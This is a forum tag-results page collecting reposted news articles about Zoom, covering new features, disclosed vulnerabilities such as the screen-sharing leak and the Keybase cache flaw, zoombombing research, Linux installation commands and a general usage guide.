Jump to content

Search the Community

Showing results for tags 'zoom'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station


  • Drivers
  • Filesharing
    • BitTorrent
    • eDonkey & Direct Connect (DC)
    • NewsReaders (Usenet)
    • Other P2P Clients & Tools
  • Internet
    • Download Managers & FTP Clients
    • Messengers
    • Web Browsers
    • Other Internet Tools
  • Multimedia
    • Codecs & Converters
    • Image Viewers & Editors
    • Media Players
    • Other Multimedia Software
  • Security
    • Anti-Malware
    • Firewalls
    • Other Security Tools
  • System
    • Benchmarking & System Info
    • Customization
    • Defrag Tools
    • Disc & Registry Cleaners
    • Management Suites
    • Other System Tools
  • Other Apps
    • Burning & Imaging
    • Document Viewers & Editors
    • File Managers & Archivers
    • Miscellaneous Applications
  • Linux Distributions


  • General News
  • File Sharing News
  • Mobile News
  • Software News
  • Security & Privacy News
  • Technology News

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

  1. Zoom launches Immersive View to unify participants in the same virtual room Zoom: Immersive View in a classroom Zoom has officially launched a new immersive video feature to help businesses create more engaging and collaborative virtual meetings. While a growing number of fledgling startups have adopted remote-first mindsets from the get-go, the transition for larger enterprises is fraught with challenges, given that they may have hundreds of thousands of workers spread across multiple regions and time zones. Despite these hurdles, major businesses — including Salesforce, Microsoft, Shopify, VMware, Dropbox, and Fujitsu — have already confirmed a permanent shift to a remote-first or hybrid working policy. But better and more adaptable virtual collaboration tools will prove vital to the long-term success of these programs — Zoom fatigue is real, after all. Zoom first announced its new Immersive View (then called Immersive Scenes) feature at its annual Zoomtopia event back in October, positioning the technology against Microsoft Teams’ Together Mode, which had launched a few months before. In a nutshell, video call hosts can use Immersive View to arrange participants — anyone from employees to panelists — in a single virtual environment. This deviates from the established norm of displaying participants in a grid-like format with each individual’s personal background showing. Above: Zoom: Immersive View for webinar panelist Immersive View supports up to 25 participants, and they can be placed in any number of environments, including a boardroom, auditorium, or classroom, depending on the event. Hosts can manually move people around on the screen or let Zoom do it automatically. Immersive View is available now in Zoom’s desktop client (version 5.6.3 or higher) for Windows and MacOS and is activated by default for all free and individual Pro accounts. Source: Zoom launches Immersive View to unify participants in the same virtual room
  2. Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data A glitch in Zoom’s screen-sharing feature shows parts of presenters’ screens that they did not intend to share – potentially leaking emails or passwords. A security blip in the current version of Zoom could inadvertently leak users’ data to other meeting participants on a call. However, the data is only leaked briefly, making a potential attack difficult to carry out. The flaw (CVE-2021-28133) stems from a glitch in the screen sharing function of video conferencing platform Zoom. This function allows users to share the contents of their screen with other participants in a Zoom conferencing call. They have the option to share their entire screen, one or more application windows or just one selected area of their screen. However, “under certain conditions” if a Zoom presenter chooses to share one application window, the share-screen feature briefly transmits content of other application windows to meeting participants, according to German-based SySS security consultant Michael Strametz, who discovered the flaw, and researcher Matthias Deeg, in a Thursday disclosure advisory (which has been translated via Google). “The impact in real-life situations would be sharing confidential data in an unintended way to unauthorized people,” Deeg told Threatpost. The current Zoom client version, 5.5.4 (13142.0301), for Windows is still vulnerable to the issue, Deeg told Threatpost. The issue occurs in a “reliably reproducible manner” when a user shares one split application window (such as presentation slides in a web browser) while opening other applications (such as a mail client) in the background, in what is supposed to be in non-shared mode. Researchers found, the contents of the explicitly non-shared application window can be perceived for a “brief moment” by meeting participants. While this would only occur briefly, researchers warn that other meeting participants who are recording the Zoom meeting (either through Zoom’s built-in recording capabilities or via screen recording software like SimpleScreenRecorder) are able to then go back to the recording and fully view any potentially sensitive data leaked through that transmission. Because this bug would be difficult to actually intentionally exploit (an attacker would need to be a participant in a meeting where data is inadvertently leaked by the bug) the flaw is only medium-severity (5.7 out of 10) on the CVSS scale. However, “the severity of this issue really depends on the unintended shared data,” Deeg told Threatpost. “In some cases, it doesn’t matter, in other cases, it may cause more trouble.” For instance, if a conference or webinar panelist was presenting slides to attendees via Zoom, and then opened a password manager or email application in the background, other Zoom participants would be able to access this information. A proof-of-concept video of the attack is below: The vulnerability was reported to Zoom on Dec. 2 – however, as of the date of public disclosure of the flaw, on Thursday, researchers said they are “not aware of a fix” despite several inquiries for status updates from Zoom. “Unfortunately, our questions concerning status updates on January 21 and February 1, 2021, remained unanswered,” Deeg told Threatpost. “I hope that Zoom will soon fix this issue and my only advice for all Zoom users… is to be careful when using the screen sharing functionality and [to follow a] strict ‘clean virtual desktop’ policy during Zoom meetings.” Threatpost has reached out to Zoom for further comment regarding the flaw, and whether it will be fixed in the upcoming release that’s scheduled to go live March 22. “Zoom takes all reports of security vulnerabilities seriously,” a Zoom spokesperson told Threatpost. “We are aware of this issue, and are working to resolve it.” With the coronavirus pandemic driving more organizations to “flatten the curve” by going remote over the past year – and thus various web conferencing platforms – Zoom has been grappling with various security and privacy issues, including attackers hijacking online meetings in what are called Zoom bombing attacks. Other security issues have come to light in Zoom’s platform over the past year – such as one that could have allowed attackers to crack private meeting passcodes and snoop in on video conferences. However, Zoom has also taken important steps to secure its conferencing platform, including beefing up its end-to-end encryption and implementing other security measures. Source: Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data
  3. Zoom to roll out ‘automatic closed captioning’ for all free accounts San Francisco: Video conferencing app Zoom said it is working towards making “automatic closed captioning” available for all the free account holders to make the service more accessible. “Among the Zoom Meetings accessibility features we offer to all users are manual closed captioning, keyboard accessibility, pinning or spotlighting interpreter video, screen reader support, and a range of accessibility settings,” the company said in a blogpost on Wednesday. “Now we are excited to announce that we are looking to take our efforts a step further and are working towards making automatic closed captioning available to all of our users in the fall of 2021,” it added. For a free user who needs access to the feature, the company is allowing users to manually request access to the Live Transcription feature via a Google Form. “To help free account holders who require Live Transcription, starting today and up until the feature’s broader release, we will also be offering automatic closed captioning to meeting hosts who need accommodation upon request,” according to the blogpost. Users need to enter their information in the form to sign up. Further, they will receive a confirmation email with more details. Automatic closed captions are also available with other video conferencing services like Google Meet. Recently, Zoom has added a feature “Studio Effects” that allows users to add a variety of eyebrows, facial hair and lip colour during live video streams. Source: Zoom to roll out ‘automatic closed captioning’ for all free accounts
  4. Exclusive: Flaws in Zoom’s Keybase App Kept Chat Images From Being Deleted A serious flaw in Zoom’s Keybase secure chat application left copies of images contained in secure communications on Keybase users’ computers after they were supposedly deleted. The flaw in the encrypted messaging application (CVE-2021-23827) does not expose Keybase users to remote compromise. However, it could put their security, privacy and safety at risk, especially for users living under authoritarian regimes in which apps like Keybase and Signal are increasingly relied on as a way to conduct conversations out of earshot of law enforcement or security services. The flaw was discovered by researchers from the group Sakura Samurai as part of a bug bounty program offered by Zoom, which acquired Keybase in May, 2020. Zoom said it has fixed the flaw in the latest versions of its software for Windows, macOS and Linux. Deleted…but not gone According to researcher John Jackson of Sakura Samurai, the Keybase flaw manifested itself in two ways. First: Jackson discovered that images that were copy and pasted into Keybase chats were not reliably deleted from a temporary folder, /uploadtemps, associated with the client application. “In general, when you would copy and paste in a Keybase chat, the folder would appear in (the uploadtemps) folder and then immediately get deleted,” Jackson told Security Ledger in a phone interview. “But occasionally that wouldn’t happen. Clearly there was some kind of software error – a collision of sorts – where the images were not getting cleared.” Discovering that flaw put Sakura Samurai researchers on the hunt for more and they soon struck pay dirt again. Sakura Samurai members Aubrey Cottle (@kirtaner), Robert Willis (@rej_ex) and Jackson Henry (@JacksonHHax) discovered an unencrypted directory, /Cache, associated with the Keybase client that contained a comprehensive record of images from encrypted chat sessions. The application used a custom extension to name the files, but they were easily viewable directly or simply by changing the custom file extension to the PNG image format, Jackson said. In a statement, a Zoom spokesman said that the company appreciates the work of the researchers and takes privacy and security “very seriously.” “We addressed the issue identified by the Sakura Samurai researchers on our Keybase platform in version 5.6.0 for Windows and macOS and version 5.6.1 for Linux. Users can help keep themselves secure by applying current updates or downloading the latest Keybase software with all current security updates,” the spokesman said. In most cases, the failure to remove files from cache after they were deleted would count as a “low priority” security flaw. However, in the context of an end-to-end encrypted communications application like Keybase, the failure takes on added weight, Jackson wrote. “An attacker that gains access to a victim machine can potentially obtain sensitive data through gathered photos, especially if the user utilizes Keybase frequently. A user, believing that they are sending photos that can be cleared later, may not realize that sent photos are not cleared from the cache and may send photos of PII or other sensitive data to friends or colleagues.” Messaging app flaws take on new importance The flaw takes on even more weight given the recent flight of millions of Internet users to end-to-end encrypted messaging applications like Keybase, Signal and Telegram. Those users were responding to onerous data sharing policies, such as those recently introduced on Facebook’s WhatsApp chat. In countries with oppressive, authoritarian governments, end to end encrypted messaging apps are a lifeline for political dissidents and human rights advocates. As a result of the flaw, however, adversaries who gained access to the laptop or desktop on which the Keybase application was installed could view any images contained in Keybase encrypted chats. The implications of that are clear enough. For example, recent reports say that North Korean state hackers have targeted security researchers via phishing attacks sent via Keybase, Signal and other encrypted applications. The flaws in Keybase do not affect the Zoom application, Jackson said. Zoom acquired Keybase in May to strengthen the company’s video platform with end-to-end encryption. That acquisition followed reports about security flaws in the Zoom client, including in its in-meeting chat feature. Jackson said that the Sakura Samurai researchers received a $1,000 bounty from Zoom for their research. He credited the company with being “very responsive” to the group’s vulnerability report. The increased use of encrypted messaging applications has attracted the attention of security researchers, as well. Last week, for example, a researcher disclosed 13 vulnerabilities in the Telegram secure messaging application that could have allow a remote attacker to compromise any Telegram user. Those issues were patched in Telegram updates released in September and October, 2020. Source: Exclusive: Flaws in Zoom’s Keybase App Kept Chat Images From Being Deleted
  5. Use Zoom’s new Studio Effects to liven up your boring meetings With an increasing number of people working or attending classes from home, video conferencing apps like Zoom and Google Meet have seen a strong surge in popularity over the last year. Due to the sheer number of alternatives available to end-users, developers are constantly innovating and adding new features to their respective apps to offer more value. For instance, Google Meet recently added a new ‘Green Room’ feature to help users check their audio and video settings before joining a call. Similarly, Zoom also added a new call end chime to the app to alert users when someone disconnected abruptly. While most of these new features aim to provide more utility, some are just added to make boring video calls more entertaining. Zoom’s new Studio Effects feature is a case in point. The feature gives you the ability to add several eyebrows, facial hair, and lip color filters to your video feed. According to a recent report from The Verge, it can be found within the “Background & Filters” option in Zoom’s Video Settings. (Image: The Verge) As you can see in the attached screenshot, it includes three tabs, labeled Eyebrows, Moustache & Beard, and Lip Color, that let you add quirky filters to your video feed. Zoom offers quite a few options to choose from, including 7 eyebrows types, 7 facial hair options, and 10 lip color variants, along with a custom color option that lets you pick a lip color that matches your outfit. You can also use the feature to change the color of your eyebrows and facial hair and even control the filter’s opacity. Additionally, the Studio Effects feature includes a toggle at the top to help you apply your preferred settings to all future meetings. But we’d recommend steering clear from it, for obvious reasons. It’s worth noting that while the Studio Effects feature was first announced back in September last year, many Zoom users have just discovered it in the app. The feature seems to be live for most Zoom users, but we’re not sure if it’s available globally. Source: Use Zoom’s new Studio Effects to liven up your boring meetings
  6. Zoombombing countermeasures are ineffective in the vast majority of cases Password-protecting meetings is among the most ineffective protections. Enlarge As the COVID-19 pandemic forced schools, colleges, and businesses to limit in-person meetings, the world quickly adopted video conferencing from services such as Zoom and Google Meet. That, in turn, gave way to "zoombombing," the term for when Internet trolls join online meetings with the goal of disrupting them and harassing their participants. Meeting services have adopted a variety of countermeasures, but a new research paper finds that most of them are ineffective. The most commonly used countermeasures include password-protecting meetings, using waiting rooms so that conference organizers can vet people before allowing them to participate, and counseling participants not to post meeting links in public forums. The problem with these approaches is that they assume the wrong threat model. One common assumption, for instance, is that the harassment is organized by outsiders who weren’t privy to meeting details. Researchers at Boston University and the State University of New York at Binghamton studied zoombombing calls posted on social media for the first seven months of last year and found that wasn’t the case in most instances. In a paper titled A First Look at Zoombombing, the researchers wrote: Our findings indicate that the vast majority of calls for zoombombing are not made by attackers stumbling upon meeting invitations or bruteforcing their meeting ID, but rather by insiders who have legitimate access to these meetings, particularly students in high school and college classes. This has important security implications, because it makes common protections against zoombombing, such as password protection, ineffective. We also find instances of insiders instructing attackers to adopt the names of legitimate participants in the class to avoid detection, making countermeasures like setting up a waiting room and vetting participants less effective. Based on these observations, we argue that the only effective defense against zoombombing is creating unique join links for each participant. The researchers reached their findings by analyzing posts on Twitter and 4chan. A vexing problem Zoombombing has been a concern for schools, universities, and other groups that have adopted video conferencing. At an August court hearing for a Florida teen accused of hacking Twitter, for instance, zoombombers interrupted the proceedings to hurl racial slurs and display pornographic videos. A Zoom conference hosting students from the Orange County Public Schools system in Florida was disrupted after an uninvited participant exposed himself to the class. The outrage that events like these cause has prompted online meeting services to adopt measures designed to counter the harassment. Many publications, Ars included, have also provided posts explaining how meeting organizers can prevent zoombombing. Countermeasures typically include: Making sure meetings are password protected When possible, not announcing meetings on social media or other public outlets Using the Waiting Room option to admit participants The problem with these measures is that they don’t work well or at all when zoombombing is organized by insiders who have authorization to join a meeting. Anyone who’s authorized to join a meeting will obviously have a meeting password that they can then share with others. Requiring participants to be vetted in a waiting room before they can join a meeting is only slightly more effective, since “insiders often share additional information with potential attackers, for example instructing them to select names that correspond to legitimate participants in the meeting,” the researchers wrote. “This reduces the effectiveness of a waiting room, because it makes it more difficult for hosts and moderators to identify intruders.” What’s more, vetting people before admitting them often doesn’t scale for meetings with large numbers of users, making that option infeasible for many. Another half-measure is providing a unique link for each participant. It won’t stop zoombombing if the meeting service still allows more than one person to join with the same link, but it does help the organizer to more easily identify the insider who provided the link to outsiders. The researchers wrote: An even better mitigation is to allow each participant to join using a personalized meeting link. This way, as long as the insider joins the meeting, unauthorized people will not be able to join using the same link. While this mitigation makes zoombombing unfeasible, not all meeting services have adopted it. At the moment of writing, only Zoom and Webex allow per-participant links that allow a single user to join at a time. To do this, Zoom requires participants to log in, and checks if the unique link is the same that was sent to that email address as a calendar invite. We encourage other meeting platforms to adopt similar access control measures to protect their meetings from insider threats. The researchers said their work is the first data-driven analysis of calls for zoombombing attacks made on social media. Given the continued and growing reliance on video conferencing, it’s not likely to be the last. Source: Zoombombing countermeasures are ineffective in the vast majority of cases
  7. How To Install Zoom On Linux? The easiest way to install Zoom on Linux The pandemic has had a huge impact on our lives and how we interact with people. Thankfully, technology has played an enormous part in helping us stay connected in these tough times. One of the essential pieces of software that gained a lot of traction during the pandemic is Zoom. In this article, let’s look at how you can install Zoom on Linux PC. Install Zoom On Linux 1. From The Official Website Installing Zoom on Linux is as easy as installing it on Windows. All you need to do is – Download Zoom Head over to the official Zoom download page by clicking here. Select the options In the Linux Type dropdown menu, select the distribution you’re running, select the OS Architecture (32/64-bit), and the distro version that you’re running. If you don’t know what distro you have installed, open the settings, and you’ll probably see an About option where you’ll find all the information about the distro. I’ll download Zoom for Ubuntu as I’m using an Ubuntu-based Linux Distro Pop!_OS. Install Zoom You can easily install Zoom in Linux Debian, Ubuntu and Ubuntu-based distros, Oracle Linux, CentOS, RedHat, Fedora, and OpenSUSE. All you need to do is download the .deb or .rpm installer and double-click to install. Installing Zoom on Arch Linux/Arch-based distros Download the Zoom binary, open the terminal, and enter the following command. sudo pacman -U zoom_x86_64.pkg.tar.xz 2. Install Zoom On Linux Using Snap Zoom can also be installed using Snap. Snap comes pre-installed on almost all the distros, and to check if it’s installed on your Linux PC, just type snap --version and the output will look something like this. $ snap --version snap 2.48.2 snapd 2.48.2 series 16 pop 20.10 kernel 5.8.0-7630-generic If you don’t see the above output, you don’t have Snap installed. To install Zoom snap, enter the following command. sudo apt install snapd sudo snap install zoom-client Wait patiently as snap installations take time. Voila! Zoom should now be installed on your PC. Open the apps list and fire up Zoom to start using it. How To Uninstall Zoom? To uninstall Zoom on Ubuntu/Debian distros, open the terminal, enter the following command, and hit enter. sudo apt remove zoom In openSUSE, open the terminal and type this command, and hit enter. sudo zypper remove zoom The command to uninstall Zoom on Oracle Linux, CentOS, RedHat, or Fedora is sudo yum remove zoom Faced any issues following the above instructions? Let us know in the comments section below. Source: How To Install Zoom On Linux?
  8. A new app allows teachers to use their iPhone or iPad as an overhead camera on Zoom It’s designed to help teachers who are teaching from home due to COVID Teachers who have found themselves holding class over Zoom have probably already figured out clever hacks to show their students documents, but there’s now an app designed specifically for that purpose (via 9to5Mac). Overviewer was made by developer Charlie Chapman, and it allows teachers (or anyone, really) to easily use their phone’s camera as a replacement for an overhead document viewer. If it’s been a minute since you were a student, or if your school didn’t have these overhead devices, they’re basically webcams pointing straight down that allow teachers to show students a printed document, book, hand drawing, or other piece of writing or image. It’s a useful ability to have, but many teachers are working from home because of COVID and may not have access to one like they would in the classroom. Participants in the Zoom call only see what your phone’s camera sees. Overviewer works as a replacement by taking advantage of Zoom’s built-in screen sharing feature that works with the iPhone when its connected to a computer with a Lightning cable, or wirelessly through AirPlay (at the moment, it doesn’t seem like Zoom offers this feature for Android users). It shows a feed from your phone’s camera on the screen, with nothing else getting in the way. The feature also offers the ability to turn your phone’s flashlight on if your lighting situation isn’t ideal, as well as the option to change which camera is being displayed. In a heartwarming blog post about how he developed the app for his wife, who works as a kindergarten teacher, Chapman explains how he saw his wife using iOS’s built-in camera app to do the same thing, and how she was frustrated by the lack of landscape support and all the buttons overlaid on-screen: So being the dorky husband that I am, I quickly built an app that does nothing other than show what the phone camera sees with zero chrome, and properly rotates the whole app so that you can share it in landscape on zoom. This did the trick and she actually used it! It’s pretty tailor made for exactly my wife’s use case but I would think that would be a pretty common one for teachers to be in right now in our current virtual teaching world. If you’re a teacher, or are thinking of some other use for the app, it’s available for free on the App Store. It’s worth noting that if you’re using a Mac, Zoom will ask for permission to record your screen and have to be restarted in order to share your phone’s screen (this is because Zoom is just displaying your phone’s screen on your computer, and then capturing that window). For more information on how the app works, the developer has made a how-to video, which you can watch below. A new app allows teachers to use their iPhone or iPad as an overhead camera on Zoom
  9. The complete Zoom guide: From basic help to advanced tricks Video conferencing has never been so critical to our work and personal lives. Here's everything you need to make your meetings more productive. Offices closed. Travel was restricted. Employers scrambled to knock together hasty virtual setups and access to corporate networks for workers required to work from home. At the beginning of 2020, few predicted that the spread of COVID-19 would have such an effect on our daily lives, our work environments, and day-to-day business operations. In the new year, little has changed. As the coronavirus outbreak spread worldwide, we became reliant on our household internet connections to keep working. There are many freelancers and contractors out there who are used to remote work; however, countless employees once based in the office are now left to master the tools available for teleconferencing on their own. Once, Skype was a key tool for communicating remotely. However, Microsoft's software has been overtaken by Zoom, a video communications platform that many of us at ZDNet consider easier to use, more lightweight, and without the same spam problems. One of Zoom's key strengths is its simplicity, but this does not mean that the platform is without a variety of advanced features that remote workers will find useful for improving their productivity. Below, we'll show you how to get started, and also offer some tips and tricks that experienced users may be missing out on. LET'S GET STARTED: ZOOM BASICS First of all, head over to Zoom in your browser. The platform is compatible with Windows, Mac, Linux, iOS, and Android. The layout will be slightly different depending on whether you are on desktop or mobile. There are four plans available; the most popular now likely being the free tier, in which virtual meetings can be held with up to 100 participants, 1-on-1 meetings without a time limit are possible, and meetings with multiple participants can be held for up to 40 minutes. (When your time is up, you can simply restart a meeting if need be.) The free option also allows users to conduct meetings in HD video and with audio, participants can join via their PC or a telephone line, and both desktops and apps can be shared. Zoom's Pro, Business and Enterprise packages come with additional features, including an increase in meeting duration limits, cloud recording and storage, Skype for Business interoperability, single sign-on options, and company branding. It is possible to join a meeting just from your browser, but in the interests of longevity and avoiding browser limitations, you should download the application. To start using Zoom, make your choice (browser or a direct download) and then sign up. You will be prompted to type in your work email -- but any will do -- or sign in through either Google or Facebook. At the next prompt, Zoom will ask for permission to send resources including product videos and how-to guides your way. Either click "confirm" or "Set Preferences;" the latter option being to receive emails once a week, once a month, or never. Make your selection. By now, a confirmation email should have landed in your inbox. Open the message, click "Activate Account" or paste the included confirmation link into your browser, and then at the next prompt, you will need to complete account creation with your name and a strong password. If you wish, on the next screen, you can invite your colleagues to also create an account. If not, click "Skip this step." Now you can choose to create a test meeting if you like, as well as add Zoom as an extension. There are various plugins available including a Google Chrome extension, Mozilla Firefox extension, Microsoft Outlook plugin, and IBM Notes plugin. If you will be using Zoom for the foreseeable future for work purposes, you may want to select and install appropriate add-ons now. Once you've launched your test meeting, you will be met with a screen similar to below, containing the meeting's URL and the option to invite others. We will go through the core features of the meeting system in a moment, but for now, let's head over to the web portal, zoom.us, to make sure that the correct settings are enabled -- and that you know how to create and launch a meeting. THE WEB PORTAL On the Zoom website, head to "Your Account" in the top-right to manage your profile. You can change details under the "Profile" tab such as your name, picture, default meeting ID, password and time zone. Next, head to "Settings." Here, you can adjust settings implemented by default, including whether or not video is automatically enabled when you -- or participants -- join a meeting; and whether or not participants can join a scheduled meeting before the host arrives. In the interests of security and to prevent scammers from hijacking a meeting, you should make sure you use strong passwords. Passwords were not always enabled by default, but after Zoom founder Eric Yuan apologized for "falling short of the community's -- and our own -- privacy and security expectations," a rush of security changes were made, including the enabling, by default, of passwords for scheduled, instant, and personal meetings. Next up is audio type. You can pick telephone and computer audio or one or the other to be automatically permitted. However, given the rapid rise of users, Zoom has warned: "Due to increased demand, dial-in by phone audio conferencing capabilities may be temporarily removed from free Basic account[s]. During this time, we strongly recommend using our computer audio capabilities." You can also decide whether or not to allow public and private chats when you host a meeting; you can give permission for files to be transferred, and who can share their screen -- just the host, or participants, too. There are other, more advanced controls, but these are the main settings you should be aware of for now. The Zoom desktop app has a similar layout, with "Settings" accessible from the top-right corner. The options you can access here are related to your PC, such as whether or not you want to use dual monitors or automatically enter a full-screen mode when a meeting starts. You can also test your microphone and speaker setup, choose a color theme, select a default location for recordings, and tweak accessibility controls, among other functions. With your basic preferences in place, let's go to the "Meetings" tab in your profile. SCHEDULING AND HOSTING A MEETING The first screen you will see reveals any scheduled meetings in your diary. Click "schedule a new meeting" and a new screen will appear, in which you can name your meeting, add a description if you want, and choose the date or time. If this is to be a continual meet up with colleagues, there is a handy "recurring meeting" checkbox under the timezone tab. If you select it, you can then choose how often the meeting needs to be repeated -- whether daily, weekly, and monthly. Once you have input these details, scroll down and click "save." THE MEETING IS SET, BUT HOW DO YOU INVITE OTHERS? The short answer is: you must do so manually. There are two ways to do this: through calendar invites, or via your own email account. If you wish to invite others through a calendar, links to Google Calendar, Outlook Calendar, and Yahoo Calendar are displayed once your meeting has been saved. Alternatively, next to the "join URL" link on this screen, there is an option to "copy this invitation." Clicking on this page element brings up a screen with all of the important information required for the meeting, including the URL, of which the meeting ID is already embedded. Copy this to your clipboard, open your email client, paste the details into a new message, and invite away. So, in short, all participants need is the meeting URL, date and time, and a password if applicable. If you want to try out features before bringing other people in, create a test meeting at this stage and select "Start this meeting." Alternatively, you can do exactly the same within the first page of the Zoom desktop app: The first prompt, in either case, will ask you to join with computer audio if you are on PC, and will also give you the option to test your speaker and microphone. At the top right of the meeting window, you can choose to go full screen. We are now going to go over the basic settings you need to know about in meetings for management purposes. Two fundamental options can be found in the bottom-left part of the black menu tab: the option to mute/unmute your microphone and either start/stop your camera. If you are using an external microphone, speaker, or camera, open up the arrow tabs next to these options to choose which equipment you want to use (external or inbuilt). Moving on, the "Manage Participants" tab is particularly important. Under this tab, you can find "invite," which is useful if you've forgotten to bring someone into a session. Clicking this option will bring up a box with everyone connected to the meeting. If you hover over a name, you can mute/unmute them, and at the bottom, there are options for doing the same for every participant. In the interests of privacy, however, hosts and other participants cannot control individual camera feeds. A handy feature to note here under "More" is "lock," which stops anyone else from joining an active session. Speaker or Gallery view: At the top, you can pick one of two view options -- but this only impacts how you view a meeting, and not others. By default, Active Speaker is the default video layout -- in which the person talking is ramped up to a larger screen -- but there is also a gallery layout that brings in every participant on one screen through a grid. The "Share Screen" tab has a number of interesting features. When selected, under "Basic," you can choose to share your PC screen with others, including your full desktop, browser, or open applications. There is also a whiteboard option that can be annotated -- we will talk about this more shortly -- and it is possible to share iPhone screens if you are on the move, too. Under "Advanced," you can share a screen portion, music or sound only, or content from a second, connected camera. There is also a file-sharing tab under "share screen" (shown under "Files"), which includes application links to Dropbox, Microsoft OneDrive, Google Drive, and Box. As a host, you can also use the arrow next to the "Share Screen" tab to control whether participants are limited to one screen share at a time, or alternatively, you can give permission for multiple screens to be shared at once. Now, let's talk about messaging. The "Chat" tab on the main bar is designed for users to type out questions and messages, as well as share files either hosted by cloud storage providers or stored directly on your PC. As a host, you can also select the "..." button to save a chat session and control who participants can talk to -- no one, the host alone, everyone publicly, or everyone publicly and privately. The final tab of note is the "Record" option, which you may want to use if you are discussing work matters and want to save the session in order to email a copy of it to others later. By default, no one except the host can record a session unless the host gives permission to do so. (More: Check out TechRepublic's guide to recording Zoom meetings.) Finally, the "End Meeting" tab finishes the session. If the host needs to leave but the meeting should carry on, they can assign the host status to another participant -- but enabling co-hosts has to be selected first in the "Meetings" tab and can only be selected by subscription holders. Alternatively, you can leave the meeting or end the meeting for all. THE SECURITY TAB The company added a "Security" icon for meeting hosts to more easily access settings including lock, waiting room, and remove participants. Under this tab, scattershot security settings are now clustered together. This includes the "lock meeting" function, whether or not to enable the "waiting room," and participant control -- allowing or disabling screen sharing, chat functions, renaming, and annotating. In addition, you can quickly remove gatecrashers or disruptive participants. ADVANCED TIPS AND TRICKS Now that the basics have been covered, there is a range of settings and features that more experienced users might want to use. Let's head back over to the web portal to run through a few options. If you are using the desktop application, you can quickly access this area by going to "Settings" -- > "View More Settings." Under "Settings," select "In Meeting: Advanced," to find features including: Breakout room: split meeting participants into separate, smaller rooms. This can also be done before a meeting begins to prevent logistical problems Remote support: allows a host to provide 1:1 support to a participant Camera control: you can allow a participant to take remote control of your camera Show a "Join from your browser" link: a workaround for users that can't download Zoom software Invitation languages: You can choose from a variety of languages for meeting invitations, including English, Spanish, French, and Russian. Virtual backgrounds: enabling/disabling Waiting room: a feature to keep participants in a 'waiting area' until the host is ready for them -- particularly handy for remote interviews or office hours. This feature is now on as default for education, Basic, and single-license Pro accounts. WEBINARS If you have a Pro, Business, or Enterprise plan, you can take advantage of the webinars option. Webinars can be set up that broadcast to up to 10,000 view-only attendees at a time. Screens, video, and audio can be shared; chat sessions between attendees and panelists can be hosted, and webinars can be run on either a pre-registration or open basis. VIRTUAL BACKGROUNDS Virtual backgrounds can be used to hide the chaos and clutter of your home. There are specific hardware requirements, which can be accessed here. Most modern PC setups should be able to manage -- but the virtual background works best with a green screen and uniform lighting. To set up a virtual background, go to the desktop app, "Settings," and choose "Virtual Background." You will be prompted to download a virtual background package -- just once -- and then you can try out different screens or add your own image/video instead. You may see a warning that says your hardware isn't good enough -- but give it a go, anyway. Once you've enabled and selected a virtual background, while in a meeting, you can toggle them off/on next to the "Stop Video" tab. WHITEBOARDS Earlier, we mentioned the "whiteboard" option under the "Share Screen" tab. This is a useful option if you are canvassing ideas or soliciting feedback and it comes with different annotation options, including text boxes, arrows, and more. The "spotlight" is a form of highlighter which can be used to bring user attention to a particular area or point. WHAT ABOUT ZOOM GATECRASHERS? When software is popular, scammers come out of the woodwork to try and find a way to capitalize. Zoom is no different; the appearance of scammers jumping into unprotected meetings and posting malicious links and pornography has given rise to the phrase "Zoom-bombing." The problem has become common enough for Zoom to publish a guide on how to prevent gatecrashers from disrupting your meetings, including pointers such as: Keep your meeting links off social media Choose "only host" for screen sharing control during a meeting Only allow signed-in users to join a meeting Use the "lock" feature to prevent random users from joining in. You might also want to consider using the Waiting Room. If you are gatecrashed, hover over the user's name in the Participants menu to bring up a "remove" option. ZOOM SECURITY Since the video conferencing software's popularity exploded due to COVID-19, the vendor has been working on improving the security of the software, together with the help of researchers and security experts. The company has introduced a range of new measures, including: Permitting meeting hosts to configure minimum meeting password requirements Changing the 9-digit setup for randomly-generated meeting IDs to 10 or 11 digits Removing Facebook's iOS SDK client to stop unnecessary data collection Implementing new ways to deal with gatecrashers Resolving vulnerabilities in the Zoom installer and Windows client Using personal meeting IDs (PMIs) can now be disabled Showing profile pictures can be disabled An expiration date for cloud recordings can be set, as well as whether or not they can be shared ZOOM PLUGINS AND INTEGRATIONS To extend the video platform's functionality, Zoom offers a variety of plugins and extensions to make meeting scheduling and joining more convenient. At present, there is a Microsoft Outlook extension, Chrome browser extension, Mozilla Firefox add-on, Skype for Business plugin, and IBM Notes plugin available. The guides for each are below: Microsoft Outlook plugin, add-in Chrome extension Firefox add-on Skype for Business IBM Notes Slack: Zoom integration with Slack is also possible for subscribers. The app can be downloaded here. ZOOM ROOMS Zoom Rooms is a more advanced software offering available as a $49 per month subscription. (There is also a 30-day free trial.) Zoom Rooms, an option for business owners, combines audio conferencing, video conferencing, and wireless screen sharing. A PC running Zoom Rooms is the bare minimum requirement, but iPads, TV displays, and external speakers, cameras, microphones can all be integrated within one room. You can find the Rooms client and controller software (iOS, Android, or Windows) in the Zoom Download Center. ADDITIONAL POINTS When screen sharing, the "optimize option" is especially useful when sharing YouTube and other online videos as it can prevent distortion, lagging, and buffering issues. Hot Keys and keyboard shortcuts are available for Mac and Windows machines. A full list can be found here. Meeting times: If you are experiencing connection issues at peak times, consider scheduling a meeting at times other than on-the-hour or on a half-hour. Need training for specific purposes, such as for education? Zoom offers over 30 live training sessions per week. If you need additional technical support, Zoom has an online help center. ZOOM'S BEST PRACTICES Double-check meeting default settings Test your audio and video as you join Use a USB-connected headset Mute your microphone when not speaking Position your webcam properly If hosting, connect from a large screen For best results, use the app and not a browser Use a stable/wired connection Join meetings in quiet areas Source: The complete Zoom guide: From basic help to advanced tricks
